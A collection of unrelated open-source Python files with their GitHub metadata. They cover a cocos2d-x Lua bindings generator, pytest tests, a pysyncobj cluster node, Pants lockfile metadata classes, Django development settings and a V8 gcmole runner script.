x64_llvm_path = os.path.abspath(os.path.join(ndk_root, 'toolchains/llvm-3.4/prebuilt', '%s-%s' % (cur_platform, 'x86_64')))
if os.path.isdir(x86_llvm_path):
llvm_path = x86_llvm_path
elif os.path.isdir(x64_llvm_path):
llvm_path = x64_llvm_path
else:
print 'llvm toolchain not found!'
print 'path: %s or path: %s are not valid! ' % (x86_llvm_path, x64_llvm_path)
sys.exit(1)
project_root = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..'))
cocos_root = os.path.abspath(os.path.join(project_root, '../../../cocos2d-x'))
cxx_generator_root = os.path.abspath(os.path.join(project_root, '../../../cocos2d-x/tools/bindings-generator'))
# save config to file
config = ConfigParser.ConfigParser()
config.set('DEFAULT', 'androidndkdir', ndk_root)
config.set('DEFAULT', 'clangllvmdir', llvm_path)
config.set('DEFAULT', 'cocosdir', cocos_root)
config.set('DEFAULT', 'cxxgeneratordir', cxx_generator_root)
config.set('DEFAULT', 'extra_flags', '')
# To fix parse error on windows, we must difine __WCHAR_MAX__ and undefine __MINGW32__ .
if platform == 'win32':
config.set('DEFAULT', 'extra_flags', '-D__WCHAR_MAX__=0x7fffffff -U__MINGW32__')
conf_ini_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'userconf.ini'))
print 'generating userconf.ini...'
with open(conf_ini_file, 'w') as configfile:
config.write(configfile)
# set proper environment variables
if 'linux' in platform or platform == 'darwin':
os.putenv('LD_LIBRARY_PATH', '%s/libclang' % cxx_generator_root)
if platform == 'win32':
path_env = os.environ['PATH']
os.putenv('PATH', r'%s;%s\libclang;%s\tools\win32;' % (path_env, cxx_generator_root, cxx_generator_root))
try:
tolua_root = '%s/Tools/tolua' % project_root
output_dir = '%s/Scripting/lua-bindings/auto' % project_root
cmd_args = {
'MapGenerator.ini' : ('MapGenerator', 'lua_MapGenerator_auto')
#'WebViewFactory.ini' : ('WebViewFactory', 'lua_WebViewFactory_auto'), \
}
target = 'lua'
generator_py = '%s/generator.py' % cxx_generator_root
for key in cmd_args.keys():
args = cmd_args[key]
cfg = '%s/%s' % (tolua_root, key)
print 'Generating bindings for %s...' % (key[:-4])
command = '%s %s %s -s %s -t %s -o %s -n %s' % (python_bin, generator_py, cfg, args[0], target, output_dir, args[1])
_run_cmd(command)
if platform == 'win32':
with _pushd(output_dir):
_run_cmd('dos2unix *')
print '---------------------------------'
print 'Generating lua bindings succeeds.'
print '---------------------------------'
except Exception as e:
if e.__class__.__name__ == 'CmdError':
print '---------------------------------'
print 'Generating lua bindings fails.'
print '---------------------------------'
sys.exit(1)
else:
raise
# -------------- main --------------
if __name__ == '__main__':
main()
| {
"content_hash": "e5c59058cf76d218abebf9ae1d6fdbad",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 132,
"avg_line_length": 34.425925925925924,
"alnum_prop": 0.5809575040344271,
"repo_name": "musenshen/SandBoxLua",
"id": "9cbb3c9888b4da8a43f9f79613c38cd4c9899d06",
"size": "5694",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "frameworks/runtime-src/Classes/core/Tools/tolua/genbindings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4933"
},
{
"name": "C",
"bytes": "7524770"
},
{
"name": "C++",
"bytes": "15406330"
},
{
"name": "CMake",
"bytes": "21051"
},
{
"name": "GLSL",
"bytes": "49475"
},
{
"name": "Java",
"bytes": "287245"
},
{
"name": "Lua",
"bytes": "1013679"
},
{
"name": "Makefile",
"bytes": "35675"
},
{
"name": "Objective-C",
"bytes": "447936"
},
{
"name": "Objective-C++",
"bytes": "295856"
},
{
"name": "Python",
"bytes": "288160"
},
{
"name": "Shell",
"bytes": "6923"
}
],
"symlink_target": ""
} |
from tululbot.utils.kbbi import lookup_kbbi_definition
def test_lookup_kbbi(mocker):
class FakeResponse:
def json(self):
return {
'kateglo': {
'definition': [
{
'lex_class_ref': 'nomina',
'def_text': 'foo bar',
'sample': 'foo bar foo bar'
},
{
'lex_class_ref': 'adjektiva',
'def_text': 'baz quux',
'sample': 'baz baz quux quux'
}
]
}
}
def raise_for_status(self):
pass
fake_term = 'asdf asdf'
mock_get = mocker.patch('tululbot.utils.kbbi.requests.get', return_value=FakeResponse(),
autospec=True)
rv = lookup_kbbi_definition(fake_term)
assert len(rv) == 2
assert {
'class': 'nomina',
'def_text': 'foo bar',
'sample': 'foo bar foo bar'
} in rv
assert {
'class': 'adjektiva',
'def_text': 'baz quux',
'sample': 'baz baz quux quux'
} in rv
mock_get.assert_called_once_with('http://kateglo.com/api.php',
params={'format': 'json', 'phrase': fake_term})
def test_lookup_kbbi_term_not_found(mocker):
class FakeResponse:
def json(self):
raise ValueError
def raise_for_status(self):
pass
mocker.patch('tululbot.utils.kbbi.requests.get', return_value=FakeResponse(),
autospec=True)
rv = lookup_kbbi_definition('asdf asdf')
assert rv == []
| {
"content_hash": "bec8c495069842dd39cdf52ca62e9680",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 92,
"avg_line_length": 28.75409836065574,
"alnum_prop": 0.44982896237172176,
"repo_name": "tulul/tululbot",
"id": "53f4821cb2300f34ce3a95e189bab9c74faeff95",
"size": "1754",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_kbbi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46076"
}
],
"symlink_target": ""
} |
"""Tests for the moderation app"""
| {
"content_hash": "b38fb587b09633cff67bc04452525da3",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 34,
"avg_line_length": 35,
"alnum_prop": 0.6857142857142857,
"repo_name": "lpatmo/actionify_the_news",
"id": "4a0f727e0489ab5c9dbe11634154d02c1375ef49",
"size": "35",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "open_connect/moderation/tests/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "546928"
},
{
"name": "HTML",
"bytes": "151617"
},
{
"name": "JavaScript",
"bytes": "211965"
},
{
"name": "Python",
"bytes": "882989"
}
],
"symlink_target": ""
} |
from pysyncobj import SyncObj, replicated
import logging
from .config import Config
logger = logging.getLogger(__name__)
class ClusterNode():
def __init__(self, task_id, config=None):
if config is None:
config = Config()
sync_address = config.get('cluster_bind_address')
sync_ports = config.get('cluster_bind_ports').split(',')
sync_port = int(sync_ports[task_id])
peers = config.get('cluster_peers').split(',') if config.get('cluster_peers') else []
peers = peers + ['%s:%d' % (sync_address, int(port)) for port in sync_ports if int(port) != sync_port]
logging.debug('starting cluster node.')
logging.debug('cluster node binding: %s:%d' % (sync_address, sync_port))
logging.debug('cluster other peers: %s' % peers)
try:
self.sync_obj = ClusterSyncObj(sync_address, sync_port, peers)
except Exception as e:
            logger.error('Error when creating sync_obj: %s', e)
class ClusterSyncObj(SyncObj):
def __init__(self, bind_address, bind_port, peers):
super(ClusterSyncObj, self).__init__('%s:%d' % (bind_address, bind_port), peers)
self.__counter = 0
@replicated
def add_schedule_job(self, trigger_id):
logger.debug('_add_schedule_job')
if self.on_add_schedule_job is not None:
try:
self.on_add_schedule_job(trigger_id)
except Exception as e:
                logger.error('Error when adding schedule job: %s', e)
def set_on_add_schedule_job(self, callback):
self.on_add_schedule_job = callback
@replicated
def remove_schedule_job(self, trigger_id):
logger.debug('_remove_schedule_job %s' % trigger_id)
if self.on_remove_schedule_job is not None:
try:
self.on_remove_schedule_job(str(trigger_id))
except Exception as e:
                logger.error('Error when removing schedule job: %s', e)
def set_on_remove_schedule_job(self, callback):
self.on_remove_schedule_job = callback
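# Minimal single-node usage sketch (hypothetical callback; cluster_bind_address
# and cluster_bind_ports come from the scrapydd Config):
#
#     def on_add(trigger_id):
#         logger.info('schedule job added: %s', trigger_id)
#     node = ClusterNode(task_id=0)
#     node.sync_obj.set_on_add_schedule_job(on_add)
#     node.sync_obj.add_schedule_job('trigger-1')  # replicated to peers by pysyncobj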
| {
"content_hash": "a6531f1be96ed92f7df7adb8d25b673b",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 110,
"avg_line_length": 40.075471698113205,
"alnum_prop": 0.5955743879472694,
"repo_name": "kevenli/scrapydd",
"id": "d049051e1113774265726072a1344b5c057641a2",
"size": "2124",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scrapydd/cluster.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "245470"
},
{
"name": "Dockerfile",
"bytes": "388"
},
{
"name": "HTML",
"bytes": "31746"
},
{
"name": "JavaScript",
"bytes": "214031"
},
{
"name": "Python",
"bytes": "448360"
},
{
"name": "Shell",
"bytes": "1101"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from dataclasses import dataclass
from enum import Enum
from typing import Any, Iterable, Set, cast
from pants.backend.python.pip_requirement import PipRequirement
from pants.backend.python.util_rules.interpreter_constraints import InterpreterConstraints
from pants.core.util_rules.lockfile_metadata import (
LockfileMetadata,
LockfileMetadataValidation,
LockfileScope,
_get_metadata,
lockfile_metadata_registrar,
)
_python_lockfile_metadata = lockfile_metadata_registrar(LockfileScope.PYTHON)
class InvalidPythonLockfileReason(Enum):
INVALIDATION_DIGEST_MISMATCH = "invalidation_digest_mismatch"
INTERPRETER_CONSTRAINTS_MISMATCH = "interpreter_constraints_mismatch"
REQUIREMENTS_MISMATCH = "requirements_mismatch"
MANYLINUX_MISMATCH = "manylinux_mismatch"
CONSTRAINTS_FILE_MISMATCH = "constraints_file_mismatch"
ONLY_BINARY_MISMATCH = "only_binary_mismatch"
NO_BINARY_MISMATCH = "no_binary_mismatch"
@dataclass(frozen=True)
class PythonLockfileMetadata(LockfileMetadata):
scope = LockfileScope.PYTHON
valid_for_interpreter_constraints: InterpreterConstraints
@staticmethod
def new(
*,
valid_for_interpreter_constraints: InterpreterConstraints,
requirements: set[PipRequirement],
manylinux: str | None,
requirement_constraints: set[PipRequirement],
only_binary: set[PipRequirement],
no_binary: set[PipRequirement],
) -> PythonLockfileMetadata:
"""Call the most recent version of the `LockfileMetadata` class to construct a concrete
instance.
This static method should be used in place of the `LockfileMetadata` constructor. This gives
calling sites a predictable method to call to construct a new `LockfileMetadata` for
writing, while still allowing us to support _reading_ older, deprecated metadata versions.
"""
return PythonLockfileMetadataV3(
valid_for_interpreter_constraints,
requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadata, instance)
return {
"valid_for_interpreter_constraints": [
str(ic) for ic in instance.valid_for_interpreter_constraints
]
}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None,
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
"""Returns Truthy if this `PythonLockfileMetadata` can be used in the current execution
context."""
raise NotImplementedError("call `is_valid_for` on subclasses only")
@_python_lockfile_metadata(1)
@dataclass(frozen=True)
class PythonLockfileMetadataV1(PythonLockfileMetadata):
requirements_invalidation_digest: str
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV1],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV1:
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
interpreter_constraints = metadata(
"valid_for_interpreter_constraints", InterpreterConstraints, InterpreterConstraints
)
requirements_digest = metadata("requirements_invalidation_digest", str, None)
return PythonLockfileMetadataV1(interpreter_constraints, requirements_digest)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV1, instance)
return {"requirements_invalidation_digest": instance.requirements_invalidation_digest}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None,
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
# Everything below is not used by v1.
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons: set[InvalidPythonLockfileReason] = set()
if expected_invalidation_digest is None:
return LockfileMetadataValidation(failure_reasons)
if self.requirements_invalidation_digest != expected_invalidation_digest:
failure_reasons.add(InvalidPythonLockfileReason.INVALIDATION_DIGEST_MISMATCH)
if not self.valid_for_interpreter_constraints.contains(
user_interpreter_constraints, interpreter_universe
):
failure_reasons.add(InvalidPythonLockfileReason.INTERPRETER_CONSTRAINTS_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
@_python_lockfile_metadata(2)
@dataclass(frozen=True)
class PythonLockfileMetadataV2(PythonLockfileMetadata):
"""Lockfile version that permits specifying a requirements as a set rather than a digest.
Validity is tested by the set of requirements strings being the same in the user requirements as
those in the stored requirements.
"""
requirements: set[PipRequirement]
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV2],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV2:
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
requirements = metadata(
"generated_with_requirements",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
interpreter_constraints = metadata(
"valid_for_interpreter_constraints", InterpreterConstraints, InterpreterConstraints
)
return PythonLockfileMetadataV2(interpreter_constraints, requirements)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV2, instance)
# Requirements need to be stringified then sorted so that tests are deterministic. Sorting
# followed by stringifying does not produce a meaningful result.
return {"generated_with_requirements": (sorted(str(i) for i in instance.requirements))}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None, # Not used by V2.
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
# Everything below is not used by V2.
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons = set()
invalid_reqs = (
self.requirements != set(user_requirements)
if is_tool
else not set(user_requirements).issubset(self.requirements)
)
if invalid_reqs:
failure_reasons.add(InvalidPythonLockfileReason.REQUIREMENTS_MISMATCH)
if not self.valid_for_interpreter_constraints.contains(
user_interpreter_constraints, interpreter_universe
):
failure_reasons.add(InvalidPythonLockfileReason.INTERPRETER_CONSTRAINTS_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
@_python_lockfile_metadata(3)
@dataclass(frozen=True)
class PythonLockfileMetadataV3(PythonLockfileMetadataV2):
"""Lockfile version that considers constraints files."""
manylinux: str | None
requirement_constraints: set[PipRequirement]
only_binary: set[PipRequirement]
no_binary: set[PipRequirement]
@classmethod
def _from_json_dict(
cls: type[PythonLockfileMetadataV3],
json_dict: dict[Any, Any],
lockfile_description: str,
error_suffix: str,
) -> PythonLockfileMetadataV3:
v2_metadata = super()._from_json_dict(json_dict, lockfile_description, error_suffix)
metadata = _get_metadata(json_dict, lockfile_description, error_suffix)
manylinux = metadata("manylinux", str, lambda l: l) # type: ignore[no-any-return]
requirement_constraints = metadata(
"requirement_constraints",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
only_binary = metadata(
"only_binary",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
no_binary = metadata(
"no_binary",
Set[PipRequirement],
lambda l: {
PipRequirement.parse(i, description_of_origin=lockfile_description) for i in l
},
)
return PythonLockfileMetadataV3(
valid_for_interpreter_constraints=v2_metadata.valid_for_interpreter_constraints,
requirements=v2_metadata.requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
@classmethod
def additional_header_attrs(cls, instance: LockfileMetadata) -> dict[Any, Any]:
instance = cast(PythonLockfileMetadataV3, instance)
return {
"manylinux": instance.manylinux,
"requirement_constraints": sorted(str(i) for i in instance.requirement_constraints),
"only_binary": sorted(str(i) for i in instance.only_binary),
"no_binary": sorted(str(i) for i in instance.no_binary),
}
def is_valid_for(
self,
*,
is_tool: bool,
expected_invalidation_digest: str | None, # Validation digests are not used by V2.
user_interpreter_constraints: InterpreterConstraints,
interpreter_universe: Iterable[str],
user_requirements: Iterable[PipRequirement],
manylinux: str | None,
requirement_constraints: Iterable[PipRequirement],
only_binary: Iterable[PipRequirement],
no_binary: Iterable[PipRequirement],
) -> LockfileMetadataValidation:
failure_reasons = (
super()
.is_valid_for(
is_tool=is_tool,
expected_invalidation_digest=expected_invalidation_digest,
user_interpreter_constraints=user_interpreter_constraints,
interpreter_universe=interpreter_universe,
user_requirements=user_requirements,
manylinux=manylinux,
requirement_constraints=requirement_constraints,
only_binary=only_binary,
no_binary=no_binary,
)
.failure_reasons
)
if self.manylinux != manylinux:
failure_reasons.add(InvalidPythonLockfileReason.MANYLINUX_MISMATCH)
if self.requirement_constraints != set(requirement_constraints):
failure_reasons.add(InvalidPythonLockfileReason.CONSTRAINTS_FILE_MISMATCH)
if self.only_binary != set(only_binary):
failure_reasons.add(InvalidPythonLockfileReason.ONLY_BINARY_MISMATCH)
if self.no_binary != set(no_binary):
failure_reasons.add(InvalidPythonLockfileReason.NO_BINARY_MISMATCH)
return LockfileMetadataValidation(failure_reasons)
| {
"content_hash": "596832e6669ae5a498df6fc5b0881cc7",
"timestamp": "",
"source": "github",
"line_count": 319,
"max_line_length": 100,
"avg_line_length": 38.78369905956113,
"alnum_prop": 0.6703847397348852,
"repo_name": "benjyw/pants",
"id": "f614b12dd8d7cbb2d520f14828f70d2423704362",
"size": "12504",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "src/python/pants/backend/python/util_rules/lockfile_metadata.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "688"
},
{
"name": "Go",
"bytes": "67315"
},
{
"name": "Java",
"bytes": "10690"
},
{
"name": "Kotlin",
"bytes": "6433"
},
{
"name": "Mustache",
"bytes": "3595"
},
{
"name": "Python",
"bytes": "7135320"
},
{
"name": "Rust",
"bytes": "1601736"
},
{
"name": "Scala",
"bytes": "21950"
},
{
"name": "Shell",
"bytes": "31723"
},
{
"name": "Starlark",
"bytes": "72809"
}
],
"symlink_target": ""
} |
"""
Django settings for expirationDate project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '_9u%=1$=lkix#6*sz@6uve1c%+)u61^fcg^n2jiy)=5742^((o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
DJANGO_APPS = (
'suit',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
)
THIRD_PARTY_APPS = (
'django_extensions',
'reversion',
'simple_history',
)
PROJECT_APPS = (
'expirationDate',
'persons',
'cemeteries',
'registers',
)
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + PROJECT_APPS
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
)
ROOT_URLCONF = 'expirationDate.urls'
WSGI_APPLICATION = 'expirationDate.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Bucharest'
USE_I18N = True
USE_L10N = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, '..', 'htdocs', 'static')
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, '..', 'htdocs', 'media')
MEDIA_URL = '/media/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'expirationDate', 'templates'),
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
)
SUIT_CONFIG = {
# header
'ADMIN_NAME': 'Cemetery Management',
# 'HEADER_DATE_FORMAT': 'l, j. F Y',
# 'HEADER_TIME_FORMAT': 'H:i',
}
| {
"content_hash": "4c559e2aa3f5067f5ecc3abf63a4de78",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 74,
"avg_line_length": 24.546153846153846,
"alnum_prop": 0.7082419304293325,
"repo_name": "BontaVlad/ExpirationDate",
"id": "93bb5f5ebbf3f7b79cf13c74cc0a8f929c08cbc8",
"size": "3191",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "expirationDate/expirationDate/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "117482"
},
{
"name": "JavaScript",
"bytes": "161291"
},
{
"name": "Python",
"bytes": "33481"
}
],
"symlink_target": ""
} |
from __future__ import print_function
import os
import os.path
import signal
import subprocess
import sys
GCMOLE_PATH = os.path.dirname(os.path.abspath(__file__))
CLANG_BIN = os.path.join(GCMOLE_PATH, 'gcmole-tools', 'bin')
CLANG_PLUGINS = os.path.join(GCMOLE_PATH, 'gcmole-tools')
LUA = os.path.join(GCMOLE_PATH, 'gcmole-tools', 'lua52')
DRIVER = os.path.join(GCMOLE_PATH, 'gcmole.lua')
BASE_PATH = os.path.dirname(os.path.dirname(GCMOLE_PATH))
assert len(sys.argv) == 2
if not os.path.isfile("out/Release/gen/torque-generated/builtin-definitions-tq.h"):
print("Expected generated headers in out/Release/gen.")
print("Either build v8 in out/Release or change gcmole.lua:115")
sys.exit(-1)
proc = subprocess.Popen(
[LUA, DRIVER, sys.argv[1]],
env={'CLANG_BIN': CLANG_BIN, 'CLANG_PLUGINS': CLANG_PLUGINS},
cwd=BASE_PATH,
)
def handle_sigterm(*args):
try:
proc.kill()
except OSError:
pass
signal.signal(signal.SIGTERM, handle_sigterm)
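# Kill the spawned analysis process when this wrapper receives SIGTERM
# (presumably so a long clang/lua run is not left behind if the harness
# times out and terminates the wrapper).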
proc.communicate()
sys.exit(proc.returncode)
| {
"content_hash": "cb7636b5b8839bfff07f3ed7fc354250",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 83,
"avg_line_length": 26.736842105263158,
"alnum_prop": 0.7145669291338582,
"repo_name": "enclose-io/compiler",
"id": "6f2a091c3c7e62c8d48d5d82a1fcced0817baef0",
"size": "1231",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "current/deps/v8/tools/gcmole/run-gcmole.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Ruby",
"bytes": "11474"
},
{
"name": "Shell",
"bytes": "131"
}
],
"symlink_target": ""
} |
"These module contains some additional functions for string manipulation."
def reverse(s):
"Reverts string s."
return s[::-1]
def distinct_len(s):
"Counts number of distinct chars in string s."
return len(set(s))
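# Illustrative usage (not part of the original module):
#   >>> reverse("abc")
#   'cba'
#   >>> distinct_len("hello")   # distinct characters: h, e, l, o
#   4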
| {
"content_hash": "f35e3c9a3197376a6175539eafcaa29d",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 74,
"avg_line_length": 19.5,
"alnum_prop": 0.6837606837606838,
"repo_name": "gvasold/gdp17",
"id": "7716ad3968d59039cbdeaa622a37e6c69991d61f",
"size": "234",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "module/mystring.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "53"
},
{
"name": "HTML",
"bytes": "4606"
},
{
"name": "Jupyter Notebook",
"bytes": "268133"
},
{
"name": "Python",
"bytes": "43755"
},
{
"name": "Shell",
"bytes": "66"
}
],
"symlink_target": ""
} |
import six
from olympia.addons.models import Category
from olympia.amo.tests import TestCase
from olympia.constants.applications import APPS
from olympia.constants.base import ADDON_EXTENSION, ADDON_PERSONA
from olympia.constants.categories import CATEGORIES
from olympia.landfill.categories import generate_categories
class CategoriesTests(TestCase):
def test_categories_themes_generation(self):
data = generate_categories(APPS['firefox'], ADDON_PERSONA)
assert len(data) == Category.objects.all().count()
assert len(data) == 15
def test_categories_addons_generation(self):
data = generate_categories(APPS['android'], ADDON_EXTENSION)
assert len(data) == Category.objects.all().count()
assert len(data) == 11
category = Category.objects.get(
id=CATEGORIES[APPS['android'].id][ADDON_EXTENSION]['shopping'].id)
assert six.text_type(category.name) == u'Shopping'
# Re-generating should not create any more.
data = generate_categories(APPS['android'], ADDON_EXTENSION)
assert len(data) == Category.objects.all().count()
assert len(data) == 11
# Name should still be the same.
category = Category.objects.get(
id=CATEGORIES[APPS['android'].id][ADDON_EXTENSION]['shopping'].id)
assert six.text_type(category.name) == u'Shopping'
| {
"content_hash": "66818f3f4c8c6d46c756eb27f7a80e5d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 78,
"avg_line_length": 39.542857142857144,
"alnum_prop": 0.6893063583815029,
"repo_name": "wagnerand/olympia",
"id": "79b54bfe34884a8de11a95395bebad199bf57dbe",
"size": "1408",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "src/olympia/landfill/tests/test_categories.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ApacheConf",
"bytes": "249"
},
{
"name": "CSS",
"bytes": "663668"
},
{
"name": "HTML",
"bytes": "1600904"
},
{
"name": "JavaScript",
"bytes": "1314155"
},
{
"name": "Makefile",
"bytes": "4235"
},
{
"name": "PLSQL",
"bytes": "74"
},
{
"name": "Python",
"bytes": "3996776"
},
{
"name": "Shell",
"bytes": "9101"
},
{
"name": "Smarty",
"bytes": "1930"
}
],
"symlink_target": ""
} |
from mock import patch
def load_settings(cls, settings):
return patch.object(cls, '_retrieve_stored_settings', return_value=settings)
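# Illustrative usage; `MyComponent` and the settings dict are hypothetical:
#
#     with load_settings(MyComponent, {'option': 'value'}):
#         component = MyComponent()
#         # component._retrieve_stored_settings() now returns the given dict
#
# The object returned by patch.object() can also be used as a decorator on a
# test method instead of a context manager.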
| {
"content_hash": "8b9b24974f983e7611852cce2dd5f550",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 80,
"avg_line_length": 28,
"alnum_prop": 0.7571428571428571,
"repo_name": "MD-Studio/MDStudio",
"id": "df6c74109a33a315da506e4083e38c82839c1228",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mdstudio/mdstudio/unittest/settings.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "70059"
},
{
"name": "Dockerfile",
"bytes": "2228"
},
{
"name": "HTML",
"bytes": "48489"
},
{
"name": "JavaScript",
"bytes": "2621"
},
{
"name": "Makefile",
"bytes": "6901"
},
{
"name": "Python",
"bytes": "711926"
},
{
"name": "Shell",
"bytes": "6139"
},
{
"name": "TypeScript",
"bytes": "66514"
}
],
"symlink_target": ""
} |
from __future__ import annotations
from textwrap import dedent
from typing import Callable
import pytest
from pants.backend.python.goals.publish import (
PublishPythonPackageFieldSet,
PublishPythonPackageRequest,
rules,
)
from pants.backend.python.macros.python_artifact import PythonArtifact
from pants.backend.python.target_types import PythonDistribution, PythonSourcesGeneratorTarget
from pants.backend.python.util_rules import pex_from_targets
from pants.core.goals.package import BuiltPackage, BuiltPackageArtifact
from pants.core.goals.publish import PublishPackages, PublishProcesses
from pants.core.util_rules.config_files import rules as config_files_rules
from pants.engine.addresses import Address
from pants.engine.fs import EMPTY_DIGEST
from pants.engine.process import Process
from pants.testutil.process_util import process_assertion
from pants.testutil.rule_runner import QueryRule, RuleRunner
from pants.util.frozendict import FrozenDict
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
preserve_tmpdirs=True,
rules=[
*config_files_rules(),
*pex_from_targets.rules(),
*rules(),
QueryRule(PublishProcesses, [PublishPythonPackageRequest]),
],
target_types=[PythonSourcesGeneratorTarget, PythonDistribution],
objects={"python_artifact": PythonArtifact},
)
return set_options(rule_runner)
def set_options(rule_runner: RuleRunner, options: list | None = None) -> RuleRunner:
rule_runner.set_options(
options or [],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
env={"TWINE_PASSWORD_PYPI": "secret"},
)
